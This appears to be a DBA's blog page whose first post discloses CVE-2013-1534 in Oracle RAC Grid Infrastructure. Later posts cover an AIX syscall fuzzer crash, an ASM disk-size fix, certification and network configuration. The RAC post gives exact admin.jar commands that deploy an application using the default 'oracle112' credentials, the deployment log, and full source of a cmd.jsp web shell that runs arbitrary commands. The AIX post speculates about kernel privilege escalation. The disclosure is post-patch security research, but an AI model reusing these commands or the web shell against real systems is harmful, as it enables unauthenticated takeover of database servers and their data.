In April 2013 Oracle fixed CVE-2013-1534 an attack that I’m going to describe here as the guy who originally found it in February 2012 (it was an 0-day for more than a year). For official information please go here Critical Patch Update April 2013. One thing though i do not agree with Oracle that it scored it with score 7.5. This statement goes like this “For Linux, Unix and other platforms, the CVSS Base Score is 7.5, and the impacts for Confidentiality, Integrity and Availability are Partial+.” Basically this is remote attack that gains Oracle Grid Infrastructure owner privileges (basically “oracle”/”dba” in 99% cases) on clustered (RAC) Oracle databases, which gives you access in read/write mode to *all* data. Here I’m following responsible disclosure (vendor notified, fixed, clients alerted) … many, many months later I think all responsible people who care have already patched their Oracle RAC systems… for Patch Set 11.2.0.3.x this means it has been fixed via Grid Infrastructure + DB PSU (PatchSetUpdate) >= 11.2.0.3.6 (current PSU is 11.2.0.3.9; for 11.2.0.3.6 the recommended Oracle Alert docId is 1525152.1: Patch Set Update and Critical Patch Update April 2013 Availability Document).

Oracle starting in release of Grid Infrastructure 11gR2 (technically 11.2.0.1) added something like Quality of Service (QoS) for Databases which in practice gives ability for DBAs to better utilize usage of resource between nodes in cluster in compatibility with business requirements. SLA are being managed by the newly introduced QoS functionality by placing workloads on “server pools”. QoS in 11.2.0.1 was not full activated but starting in Grid Infrastructure 11.2.0.2 it is online by default, even without confirmation, etc. It is also being activated by default on any upgrade.

The QoS on RAC/Grid Infrastructure is partially being implemented by embedded Oracle Containers for Java (OC4J).

qosadmin account (with always default pw of “oracle112″ per Oracle documentation on every install) has always an oc4j-administrators role assigned in /u01/app/11.2.0/grid/oc4j/j2ee/home/OC4J_DBWLM_config ($GRID_HOME/oc4j/j2ee/home/OC4J_DBWLM_config) in file system-jazn-data.xml (JAZN stands for Java AuthoriZatioN). The same security configuration file is also being used as place to control of whether username:password pair is authorized to deploy any J2EE application.

This means that OC4J is prone to arbitrary command execution on any Oracle clustered (RAC) database running at least on top of Oracle Clusterware (AKA Grid Infrastructure) >= 11.2.0.2, until CPU (PSU) April 2013 has been applied. This affects both customers using QoS and those not using it. The reason is because OC4J service (serving HTTP interface over port 8888) is always and by definition enabled. The attack would by definition use “qosadmin” account… The QoS for RAC documentation (which nobody does read because it is “new” feature and by definition nobody uses nothing in production like this) states that the password for “qosadmin” should be changed because it may be used for QoS-related functionality. The remaining functionality seems to be not enabled because it was not configured… but there’s more.

What’s more interesting is that there is second account named “oc4jadmin” (a typical default OC4J admin), after brute-forcing it also appears to be set to “oracle112″… on every installation out there… and you won’t find a single line in official documentation for RAC that this “backdoor” should be disabled. So in summary every RAC >= 11.2.0.2.0 on this planet has the same passwords set for uploading J2EE applications remotely over RMI (Java thing). The oc4jadmin account is also assigned the oc4j-administrators role.

Some more details:
a) platform independent (100% success rate) exploitation vector
b) arbitrary command execution
c) gives UID of Oracle Grid Infrastructure software owner (typically “oracle” [1] or “grid” [2])
d) affects RAC >= 11.2.0.2, >= 11.2.0.3, has been tested on
[*] 11.2.0.2.0 (linux x86_64),
[*] 11.2.0.3.0 (linux x86_64),
[*] 11.2.0.3.1 // CPU Jan2012
[*] 11.2.0.3.2 // CPU Apr2012
[*] 11.2.0.3.5 // CPU Jan2013
e) so by definition it will also work against flagship Oracle Exadata “Unbreakable” Database Machine (http://www.oracle.com/us/products/database/exadata/overview/index.html) as it utilizes Oracle RAC/Grid Infrastructure
f) this thing is remote
g) this thing does NOT require any sort of authentication (just plain TCP/IP connectivity to the servers is enough)
h) vulnerability is present in any installation of Oracle Grid Infrastructure >= 11.2.0.2.0
i) no social engineering is required at all
j) remote ports 23792 and 8888 needs to be reachable to at least single RAC node (the one running the RMI service)
k) it does NOT work against Oracle Restart (single server non-RAC Grid Infrastructure installation)

[1] – by being “oracle” UNIX/Linux user one can connect “/ AS SYSDBA” so it is full compromise of data (including modification). Additionally because it is compromise giving shell access it is very easy to also defeat Oracle Database Vault (additional option for segregation of DBAs from users – think in terms of MAC vs DAC [4]). If you are interested in defeating Oracle Databases with Vault option then I recommend you the following link http://jakub.wartak.pl/blog/?p=92 :)

[2] – when a new feature “Role Separation” introduced in 11gR2 [separates ASM/Grid/Clusterware admins from DBAs] is deployed, which is very rare, it is still possible to get root, I’ll blog about it in future. That’s why probably Oracle scored it CVSS 7.5, but the main point is it is very rare to see separated Grid Infrastructure owner from Oracle RDBMS Home owner

….ooooOOOO Exploitation Demonstration OOOOoooo…..

OC4J provides a command-line utility, admin.jar and admin_client.jar. You can use any of them however I’ve only tested admin.jar (which of course is installed with any OC4J, RAC >= 11.2.0.2.0 software too). Both JARs are actually just simple tools to upload single EAR file and reconfigure remote OC4J so that is starts serving requests for certain uploaded applications under specific URLs. We are going to upload cmd.ear :) The best documentation on them comes directly from Oracle e.g. here
http://docs.oracle.com/cd/B31017_01/web.1013/b28951/overview.htm#CJAJHJIA

The easiest way to get the admin.jar (however I’ve used the one coming with RAC) is to download it from Oracle OC4J download page as it contains “OC4J Admin Client” (link http://www.oracle.com/technetwork/middleware/ias/downloads/101310-085449.html , 3 disks, total 1.4GB). Probably you need to use admin.jar/admin_client.jar as close to the version of OC4J being attacked (e.g. usage of 9.x.x admin.jar might fail uploading to RAC >= 11.2.0.2 as the OC4J embedded there is at version 10.1.3, etc). I would recommend installing it on RHEL/OL compatible Linux distribution if possible (due to the enterprise nature of Oracle software). The other thing is that you could probably use some ready-to-run RAC VirtualMachine Linux template from Oracle (works for me under XEN). I’ve also tried the metasploit generic RMI uploaders (for JBoss if i remember correctly) but I’ve failed (perhaps it’s possible, but IMHO there are more easy ways).

Actually there are only 2 commands and 1 click to exploit this vulnerability. You do not need to write any tools/exploits, just execute several commands to upload cmd.ear onto vulnerable RAC installation due to the default passwords being deployed.

1. Deploy/upload file (exploit) to vulnerable RAC cluster
————————————————————-

Detail: java -jar admin.jar ormi://<target>:23792 qosadmin oracle112  -deploy -file <path_cmd_exploit.ear> -deploymentName cmd

e.g.:

[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112  -deploy -file ~/cmd.ear -deploymentName cmd
Uploading file /root/cmd.ear to oc4j server side
[ 2012-06-08 08:14:39.290 EDT ] Application Deployer for cmd STARTS.
[ 2012-06-08 08:14:40.850 EDT ] Copy the archive to /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear
[ 2012-06-08 08:14:40.879 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear begins...
[ 2012-06-08 08:14:40.881 EDT ] Unpacking cmd.ear
[ 2012-06-08 08:14:40.887 EDT ] Done unpacking cmd.ear
[ 2012-06-08 08:14:40.895 EDT ] Unpacking cmd.war
[ 2012-06-08 08:14:40.905 EDT ] Done unpacking cmd.war
[ 2012-06-08 08:14:40.906 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear ends...
[ 2012-06-08 08:14:40.907 EDT ] Starting application : cmd
[ 2012-06-08 08:14:40.907 EDT ] Initializing ClassLoader(s)
[ 2012-06-08 08:14:40.908 EDT ] Initializing EJB container
[ 2012-06-08 08:14:40.909 EDT ] Loading connector(s)
[ 2012-06-08 08:14:40.921 EDT ] Starting up resource adapters
[ 2012-06-08 08:14:40.921 EDT ] Initializing EJB sessions
[ 2012-06-08 08:14:40.922 EDT ] Committing ClassLoader(s)
[ 2012-06-08 08:14:40.922 EDT ] Initialize cmd begins...
[ 2012-06-08 08:14:40.927 EDT ] Initialize cmd ends...
[ 2012-06-08 08:14:40.929 EDT ] Started application : cmd
[ 2012-06-08 08:14:40.932 EDT ] Application Deployer for cmd COMPLETES. Operation time: 1642 msecs

[root@attacker home]#

2. Now we bind EAR(application/exploit) to the URL of OC4J server
————————————————————————-
Once the J2EE(EAR) application has been deployed you need to bind it to visible URL:

[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112 -bindWebApp cmd cmd default-web-site /cmd
[root@attacker home]#

Basically you can specify qosadmin or oc4jadmin, as I’ve stated earlier it doesn’t matter.

3. Profit!
——————————————–
OK, you need to open web-browser first and go to URL http://target:8888/cmd/cmd.jsp?cmd=id+-a , where target is one hostname of the RAC nodes

Or if you need kicking ass web GUI interface to own someone: http://RACtarget:8888/cmd/

-J.

p.s. the cmd.jsp (and EAR built from it – i’m not going to provide it) is very simple:

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</BODY></HTML>

ASM diskgroup with negative disk sizes

January 7th, 2014

Sometimes as DBA you will see strange signs on your way, like this one ASM +DATA diskgroup with no data, no files something taking space(notice the Total_MB != Free_MB):

ASMCMD> lsdg
State    Type    Rebal  Sector  Block       AU  Total_MB  Free_MB  Req_mir_free_MB  Usable_file_MB  Offline_disks  Voting_files  Name
MOUNTED  EXTERN  N         512   4096  1048576   4095940  3271458                0         3271458              0             N  DATA/
MOUNTED  EXTERN  N         512   4096  1048576    102398   102304                0          102304              0             N  REDO/
MOUNTED  EXTERN  N         512   4096  1048576      1019      623                0             623              0             Y  SYSTEMDG/
ASMCMD> find +DATA *
ASMCMD> ls +DATA
ASMCMD> lsdsk
Path
/dev/oracleasm/disks/DATA_05
/dev/oracleasm/disks/DATA_06
/dev/oracleasm/disks/DATA_07
/dev/oracleasm/disks/DATA_08
/dev/oracleasm/disks/DATA_09
/dev/oracleasm/disks/DATA_10
/dev/oracleasm/disks/DATA_11
/dev/oracleasm/disks/DATA_12
/dev/oracleasm/disks/DATA_13
/dev/oracleasm/disks/DATA_14
/dev/oracleasm/disks/REDO_02
/dev/oracleasm/disks/SYSTEMDG_DISK01
ASMCMD>

Rebalance won’t help, ASM logs are clear and so you are more and more confused. The situtation is a little bit awkward but one can find a negative (!) capacity (close to -2^32 value) of some ASM disks that were recently added:

ASMCMD> lsdsk -k -G DATA
Total_MB      Free_MB   OS_MB  Name       Failgroup  Failgroup_Type  Library  Label  UDID  Product  Redund   Path
  409594       409037  409594  DATA_0000  DATA_0000  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_05
  409594       408885  409594  DATA_0001  DATA_0001  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_06
  409594       408895  409594  DATA_0002  DATA_0002  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_07
  409594       408680  409594  DATA_0003  DATA_0003  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_08
  409594       408987  409594  DATA_0004  DATA_0004  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_09
  409594       408931  409594  DATA_0005  DATA_0005  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_10
  409594       409079  409594  DATA_0006  DATA_0006  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_11
  409594       408964  409594  DATA_0007  DATA_0007  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_12
  409594  -4294555512  409594  DATA_0008  DATA_0008  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_13
  409594  -4294554748  409594  DATA_0009  DATA_0009  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_14
ASMCMD>

To fix the problem one can drop the affected ASM disks, remove ASMLib labels, and the critical thing is to reinitialize/overwrite with 0 (using dd from /dev/zero) large header on the individual LUN (at least 10MB) and afterwards re-add those disks (using ASMLib) to the diskgroup using normal ALTER DISKGROUP +DG ADD DISK syntax. Afterwards you will find normal utilization in the diskgroup:

SQL> select name, state, type, total_mb, free_mb from v$asm_diskgroup;

NAME                           STATE       TYPE     TOTAL_MB    FREE_MB
------------------------------ ----------- ------ ---------- ----------
DATA                           MOUNTED     EXTERN    4095940    4090620
REDO                           MOUNTED     EXTERN     102398     102304
SYSTEMDG                       MOUNTED     EXTERN       1019        623

SQL>

Reason: probably LUN disks were not properly initialized (only 1MB has been overwritten), however no errors were found during 1st initialization. Another strange thing on so not critical development system :)

Oracle Certified Master 11g

December 3rd, 2013

Hi.

It is official now: I have successfully passed Oracle Database 11g Administrator Certified Master Exam (at the age of 28 should I add). It took long time preparing for it (years since starting career as Oracle DBA), so there were almost no internal-like blog posts.

  • It’s of the most advanced exams in IT for Senior DBAs managing mission critical 24×7 environments (blood-life of any big IT system currently).
  • The best place for information on this exam is the OCM page itself, but you are going to fully realize it after the exam
  • Costs are insane (OCA, OCP as perquisites + 3 Oracle University trainings[$$$] + cost of the 2-day exam [$$])
  • Tempo on the practical exam is insane too, there is no time left for thinking, you literally are doing stuff faster than you can think about it for 2 full days.
  • Mistakes costs a lot of time, it is all about skills and speed. If you have skills, but won’t be to perform some Exam Topic under single skill-set time even do not bother thinking about the exam itself.
  • You are not allowed to loose your data and I think it is fair to say, if you loose the database (or database availability for too long) you are out of the exam. This is tested but as I’m under NDA I will not go into details.

The stress caused by the number of tasks to be performed plus stress of doing something wrong (fear that you will damage your main production DB) plus constant stress during the exam of something random (like hardware, deliberate actions) failing create truly unique atmosphere during those 2 days… It is like 4 years of growth for Oracle-based IT system compressed into 2 days with all the obstacles and challenges.

RATE_LIMIT and Oracle RAC 11gR2?

November 4th, 2013

Oracle SQLNet/TNS connections rate limiting is an awesome way of increasing stability of Oracle databases by allowing controlling insane behavior of starting up Applicaton Servers or Middleware components that push hundredths connections to the databases and thus killing CPU on the database/server side (and impacting other critical work). The way it works is also very important, it is not just refusing connections, but accept()-ing socket, but not starting processing (just queuing the work). For more detail you can look official Oracle whitepaper, especially www.oracle.com/technetwork/database/enterprise-edition/oraclenetservices-connectionratelim-133050.pdf.

The way its working is important , because rejecting the TCP connections (via TCP FIN or TCP RST) would cause application to get “Unable to get connection” type errors, which is in most cases not something you want to achieve for various reasons. If that feature doesn’t work you won’t be able to re-implement it in different way – let’s say using Linux’s NetFilter – because you are able to rate limit TCP connections there primarily by dropping them.

You may be surprised after reading official Oracle documentation http://docs.oracle.com/cd/E11882_01/network.112/e10835/listener.htm#NETRF008 regarding rate limiting Oracle SQLNet/TNS connections is NOT supported on RAC installations. The official documentation itself is silent on this topic, but this has been confirmed via Oracle SR to support. The probable primary reason for this is that CRS in 11gR2 manages normal and SCAN listeners so you have no choice of altering Oracle managed listner.ora and endpoints_listener.ora files because they are overwritten by… but still documentation asks you to them. Clearly a conflcit here.

On RAC/CRS the listeners are supposed to be altered only via “srvctl” command. srvctl actually is just frontend because oraagent.bin daemon takes care since 11gR2 for monitoring and housekeeping listeners. The problem is that srvctl does NOT have a way to enable RATE_LIMIT, but also there is no option to alter more advanced parameters like QUEUESIZE (fortunately on Linux 2.6.x backlog depth for listen() seems to be SOMAXCONN=/proc/sys/net/core/somaxconn=128 by default), SDU, etc (those are actually being mentioned in Bug 11782958: “SRVCTL DOES NOT SUPPORT LISTENER CONFIGURATION LIKE MODIFYING QUEUESIZE, SEND/RE”, also in DocID 1292915.1 “Setting Parameters for Scan and Node Listeners on RAC, Queuesize, SDU, Ports, etc”)

Sample srvctl options for 11gR2:

[oracle@racnode1 ~]$ aso srvctl config listener -a
Name: LISTENER
Network: 1, Owner: oracle
Home: <CRS home>
  /u01/app/11.2.0/grid11203 on node(s) racnode1, racnode2
End points: TCP:1521
[oracle@racnode1 ~]$ aso srvctl modify listener -h

Modifies the configuration for the listener.

Usage: srvctl modify listener [-l <lsnr_name>] [-o <oracle_home>] [-p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"] [-u <oracle_user>] [-k <net_num>]
    -l <lsnr_name>           Listener name (default name is LISTENER)
    -o <oracle_home>         ORACLE_HOME path
    -p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"       Comma separated tcp ports or listener endpoints
    -u <oracle_user>         Oracle user
    -k <net_num>             network number (default number is 1)
    -h                       Print usage
[oracle@racnode1 ~]$

Additionally in Doc Id 1568591.1 “11gR2 Listener With RATE_LIMIT Set: Slow Connect Time and Tnsping Response Time High with TNS-1158 Error” BUG:16409926 “LISTENER MEMORY LEAK IF RATE_LIMIT IS USED AND ENFORCED FREQUENTLY” is being mentioned (still not present in 11.2.0.2.x and 11.2.0.3.x PSUs, but fixed in 12.1.0.1 and included from start in 11.2.0.4.0). Overall this feature doesn’t seem to be widely used and/or tested and doesn’t make good feelings…

CVE-2012-0723: first worlds AIX system call fuzzer and it’s interesting results

October 7th, 2013

I’ve been intrigued for a long by the so called fuzzers, I’ve wanted to give it a try on AIX some time ago. Let’s take one of the most recent AIX release that i had at that time, e.g. 6.1 Technology Level #6 Service Pack #4 (btw it works on 7.1.0.0 too):

$ oslevel -s
6100-06-04-1112
$ id
uid=100(guest) gid=100(usr)
$
$ ./ble
[After a while system reboots]

root@XYZ:# errpt -j 67145A39 -A
---------------------------------------------------------------------------
LABEL:          DUMP_STATS
Date/Time:       Fri Sep 16 05:06:17 EDT 2011
Type:            UNKN
Resource Name:   SYSDUMP
Description
SYSTEM DUMP
Detail Data
DUMP DEVICE
/dev/lv_dumplv
DUMP SIZE
             242688512
TIME
Fri Sep 16 05:04:31 2011
DUMP TYPE (1 = PRIMARY, 2 = SECONDARY)
           1
DUMP STATUS
           0
ERROR CODE
0000 0000 0000 0000
DUMP INTEGRITY
Compressed dump - Run dmpfmt with -c flag on dump after uncompressing.

FILE NAME

PROCESSOR ID
           0
root@XYZ:#

[..]

(0)> where
pvthread+011200 STACK:
[004CEB5C]rmsock+00001C (F3FCC00000000000 [??])
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9610

(0)>

On different system 6100-03-01-0921:

(0)> where
pvthread+00AF00 STACK:
[0043DCFC]rmsock+00001C (F3FC000000000000 [??])
[00003844].svc_instr+000144 ()
[kdb_get_virtual_memory] no real storage @ 2FF229D0
[10000590]10000590 ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9680
(0)>

As you can see above it attempted any random syscall but on rmsock() – executed by non privileged user – it rebooted system (because of attributes on sys0 device that cause to reboot kernel in case of kernel panic). Typical Denial of Service attack, isn’t it?

Now let’s try something more intelligent (found during the research) – using only syscall number 793 on version 6100-06-04-1112:

$ ./ble 793
using only sc=793

.. and the system is dead. In AIX kernel debugger session on dump file after reboot you can see that even the system vector call instruction handler seems to be not visible, perhaps indicating some kind of memory overwrite in kernel space. (Probably) this could be exploited with finding offset of privilege access structure handling all UID/GIDs

(0)> where
pvthread+018C00 STACK:
[0001BF00]abend_trap+000000 ()
[000C585C]xm_bad_free+00025C (??, ??, ??, ??)
[000C4F30]xmfree+0004F0 (??, ??)
[046A7868]ptx_get_ndd_tree+000088 (??, ??, ??, ??, ??)
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9640

(0)>
[..]
(0)> ppid 06400D8
              SLOT NAME     STATE      PID    PPID          ADSPACE  CL #THS

pvproc+019000  100*ble      ACTIVE 06400D8 07700C8 0000000848B32480   0 0001

[..]
IDENTIFIER. uid        :00000064  ........... suid       :00000064
........... pid        :006400D8  ........... ppid       :007700C8
........... sid        :006E0092  ........... pgrp       :006400D8
[..]
(0)> nm pvproc
Symbol Address : F1000F0A00000000
   TOC Address : 02B65540

(0)>

so as you can see UID of our “ble” system call fuzzing process was 0×64 (or in 100 if you are uncomfortable with hex notations). By changing value at address 0xF1000F0A00000000+0×19000 one could get root shell probably, but researching my way to do that could be very time intensive.

And sample from most recent AIX 7.1 that I was having access to:

guest@hostA:# oslevel -s
7100-00-03-1115
guest@hostA:# ./ble 766
using only sc=766

… and the system is dead:

(2)> where
pvthread+011100 STACK:
[F1000000C01E06CC]dupb+00000C (0000000030CBEE17 [??])
[F1000000C01E05DC]dupmsg+00001C (??)
[00014D70].hkey_legacy_gate+00004C ()
[0000386C]ovlya_addr_sc_flih_main+00014C ()
[kdb_get_virtual_memory] no real storage @ FFFFFFFF3FFFE60
[kdb_read_mem] no real storage @ FFFFFFFFFFF95F0

(2)>

IBM has been notified months ago, patch has been released some time ago:http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc (affects AIX 5.3, 6.1 and 7.1 plus all VIOS too). Happy patching :)

-J.

Oracle RAC SCAN is not compatibile with NAT (and thus with PCI DSS)

August 6th, 2013

Oracle Single Client Access Name (SCAN) – a single access point name for Oracle RAC instance VIPs – seems often to be problematic in environments that use NAT or have to be able with compliance regulations such as PCI DSS:

  1. section 1.3.3 – “Do not allow any direct connections inbound or outbound for traffic between the Internet and the cardholder data environment”
  2. section 1.3.8 – “Do not disclose private IP addresses and routing information to unauthorized parties. Note: Methods to obscure IP addressing may include, but are not limited to: Network Address Translation (NAT) [..]“

The problem with giving external/internal parties access to Oracle RAC database clusters basically could be defined as “Oracle SCAN incompatibility with Destination NAT/TCP proxies that are network brokers”, here’s simple successful connection example to TNS_ENTRY1 alias (served via single 1xSCAN raccluster-scan VIP and racnode1/racnode2 Oracle VIPs)

[someone@racnode1 ~]$ sqlplus doesnotexists@TNS_ENTRY1
[..]
[someone@racnode1 ~]$ grep -e nnftrne: -e niotns: -e nsc2addr: sqlnet_1696.trc
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:527] niotns: entry
(1002018528) [06-AUG-2013 09:58:30:527] niotns: niotns: setting up interrupt handler...
(1002018528) [06-AUG-2013 09:58:30:527] niotns: Not trying to enable dead connection detection.
(1002018528) [06-AUG-2013 09:58:30:528] niotns: Calling address: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=raccluster-scan)(PORT=1521))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone))))
(1002018528) [06-AUG-2013 09:58:30:529] nsc2addr: (DESCRIPTION=(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone)))(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.43)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:537] nsc2addr: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.42)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:572] niotns: niotns: passing ns handle back up...
(1002018528) [06-AUG-2013 09:58:30:572] niotns: exit
[someone@racnode1 ~]$

As you can see from the above example the following is happening:
a) client is connecting via TCP/1521 to raccluster-scan
b) SCAN listener on raccluster-scan redirects – via TCP data – to hostname of the least loaded Oracle VIP (!)
c) client spawns a new connection directly to the Oracle VIP on TCP/1521 (!!)

The main problem is that when you have DNAT defined with single TCP port redirection that looks like this some Oracle client –TCP port 33333 –> DNAT/proxy_redirection –> Oracle SCAN VIP, this is not going to work because Oracle SCAN listener will redirect “some Oracle client” to Oracle VIP TCP/1521. This will fail in 1 out of 3 ways:

  1. failure scenario1: client might fail to resolve hostname using it’s own DNS
  2. failure scenario2: client might succeed DNS hostname resolution of OracleVIPX resolution but is going to be unable to reach the private VIP address via IP routing because routers/default gateway won’t know how to route to the destination (e..g client is coming from different organization, internet, etc)
  3. failure scenario3: client might succeed DNS hostname resolution, might even be able to route to the the OracleVIPX IP is, but there is firewall somewhere in between (e.g. on the same box that is doing DNAT/TCP proxy) blocking “some client” to reach directly OracleVIPX on TCP/1521

There are several solutions to this problem:
1) don’t use Oracle SCAN simple name but provide long TNS conneciton string with a number of NAT-ted/proxied TCP ports defined (every Oracle RAC node VIP should have its own NATTed/proxied TCP port for failover purposes – Oracle client is responsible for load balancing and failovering Oracle connections)
- or -
2) implement some kind of highly available TCP proxy that intelligently routes Oracle traffic to healthy RAC instances (e.g. HAproxy if you really have clients that support only short Oracle hostnames)
- or -
3) do tricks on external-facing DNS name servers (or locally on clients by placing entries on /etc/hosts) by spoofing internal host names as proxy one, but you will need 1:1 ratio of external to internal IPs to meet this goal (remember each Oracle VIP serves connections on port 1521!)
- or -
4) THE SIMPLEST ONE: do not use NAT and allow direct traffic on firewall, as NAT is evil :)

-J.